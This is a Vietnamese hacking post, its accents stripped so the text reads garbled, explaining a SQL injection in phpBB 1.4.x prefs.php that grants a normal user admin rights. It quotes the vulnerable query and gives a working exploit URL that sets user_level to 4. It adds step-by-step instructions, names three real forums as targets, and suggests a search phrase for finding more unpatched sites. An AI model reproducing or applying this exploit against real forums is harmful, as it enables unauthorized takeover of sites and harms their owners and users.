Li trong phpBB 1.4.

x c php ot quyn Admin :

trang ny c c ln

Cc forum phpBB 1.4.x c mt li rt nghim trng cho php mt user bnh thng c th chy on lnh cho php cp nht vi thng tin trong preferences c c quyn admin. Mt trong s li c tm thy trong on code sau: < Example sql query in prefs.php > $sql = "UPDATE users SET user_viewemail='$viewemail', user_theme='$themes', user_attachsig = '$sig', user_desmile = '$smile', user_html = '$dishtml', user_bbcode = '$disbbcode', user_lang = '$lang' WHERE (user_id = '$userdata[user_id]'"; </ End example code > khai thc, ta chy lnh modify prefereces trong file prefx.php, bng cch xc nh mt gi tr c th cho bin viewemail. Vd sau s t cho mt username maxx c quyn admin (privilege level 4): http://sitename/phpBBfolder/prefs.php?save=1&viewemail=1',user_level %3D'4'%20where%20username%3D'maxx'%23 Lnh ny s chy lnh sql cp nht thng tin v viewemail ng thi c user_level. Nh vy, cc bc cn thit th test hack mt forum dng ny nh sau: - ng k 1 acc - Login vo vi acc va ng k - Chy link vd trn - Nu thit lp preferences thnh cng (ko bo li), bn return li forum index v vo Administration Panel cui forum. Lu c mt vi forum sau khi set preferences thnh cng, vn ko thy Administration Panel, bn c th th vo theo link sau: /phpBBfolder/admin/index.php (nh forum pregnancy.org di) Mt vi forum th nghim: http://tuxedox2.dyndns.org/phpBB/index.php http://www.pregnancy.org/phpBB/index.php http://webraovat.com/phpBB/ Cc bn c th tm thm cc forum phpBB 1.4.x cha fix trn net, search theo t kha v d nh: "powered phpbb 1.4.0"